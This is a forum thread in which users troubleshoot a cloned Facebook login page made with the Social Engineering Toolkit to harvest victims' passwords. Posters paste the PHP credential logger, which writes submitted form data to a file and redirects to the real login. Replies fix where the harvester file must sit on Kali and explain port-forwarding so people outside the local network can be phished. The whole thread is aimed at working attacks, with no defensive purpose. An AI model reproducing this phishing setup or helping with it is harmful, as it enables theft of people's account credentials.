Forum Thread: Harvester Give a Blank Plain Txt File ??

Harvester Give a Blank Plain Txt File ??

hey Guys,my second post here,everyday i'm got another hacking tutorial,another suggestion,and also got some new way to learn,and yes thanks for you guys and thanks for this good site,im really like it.

i'm got another problem when exploring my linux because im a little bit new with this linux machine.
im trying site cloner with social engineering toolkit and cloning facebook for example.
everything works fine at the beginning,and also im already set up my apache2,index.html,and my post.php

when i'm access the cloned site with my phone,the cloned site load to fake facebook perfectly,and i'm fill the log-in and password,as we know the phising site will redirected us to real facebook site and we have too fill the log-in again,

after that im tryn to check the harvester.txt file but im just got a blank txt file....did i miss something or what ??

19 Responses

Maybe a problem with post.php not collecting data correctly from the index.html ... care to pastebin your code ?

<?php $file = 'harvester2015-10-16 10:32:55.818469.txt';fileputcontents($file, printr($POST, true), FILEAPPEND);?><meta http-equiv="refresh" content="0; url=http://www.google.com" />

that was content of my post.php ,see anything wrong ??

Well, I asked pastebin because I knew that this message editor is lacking proper insertion of chars like _ [ ] that are essential in php.

well,im already find solution,i dont know but, simply replace index.html on html folder with newly generated one :/ and let the post.php in its place

it happened to me...and when i checked the files generated by setoolkit, i found "post.php" and "index.html" in the /var/www/html/ directory, but the "harvester.txt" was in the /var/www/ directory...i moved it to /html/ and everything worked fine. it's a problem i noticed with setoolkit in kali sana...it still generates the files in the /www/ directory which is the default apache2 root directory in KALI 1.0, but in KALI SANA the root directory is /var/www/html/

so we have to place the index.html,post.php,and harvester file in the html folder,right ??

yes that's right, if you're on KALI SANA

does this cloned site work through internet (WAN) ??

i tried it over WAN, but the page didn't show up properly. maybe it was because of my slow internet connection. Try it yourself and let us know. You need to portforward port 80 and start apache2

maybe the port forwarding is the only answer for it :/
let me tell you when im done

The only answer? of course its 100% required for wan attacks. There is no no connection outside unless the ports are open.

Guys I am having a few problems:
1- The website will not load up correctly. I get the following error:

Unable to connect

Iceweasel can't establish a connection to the server at 192.168.0.4.

The site could be temporarily unavailable or too busy. Try again in a few moments.
If you are unable to load any pages, check your computer's network connection.

If your computer or network is protected by a firewall or proxy, make sure that Iceweasel is permitted to access the Web.

2- The one time I was able to actually have the page show up (happened once), the page never redirected to the real facebook page, it instead gave me an error

3- The harvest file was a blank page. My post.php file reads the following:

<?php $file = 'harvester(underscore sign)2015-10-23 00:34:57.111750.txt';file(underscore sign)put(underscore sign)contents($file, print(underscore sign)r($(underscore sign)POST, true), FILE(underscore sign)APPEND);?><meta http-equiv="refresh" content="0; url=(square open braket)https://login.facebook.com/login.php (square close braket)" />

any idea??????
Please help!!!!

its happen to me before,if you notice that all setoolkit generated file was placed outside the html folder,if yes,you have to put it manually to html folder.and maybe you have to set your apache2,,and one more,try to access the fake website not with your ip,but click the index.html and it will redirected to iceweasel

can someone put a step by step cloning site out of local network,
do i use my public ip instead of the 192.168.. ? do i set public ip and port next to it? (34.275.687:80) for example?

i do everything and i opened port 80 but at canyouseeme.com doesn't show that port 80 is working and i already running apache2 and mysql and everything about port 80

Type :8080 thats two 80 x2 and it will show up. Let me know if it works after that.

Share Your Thoughts

  • Hot
  • Active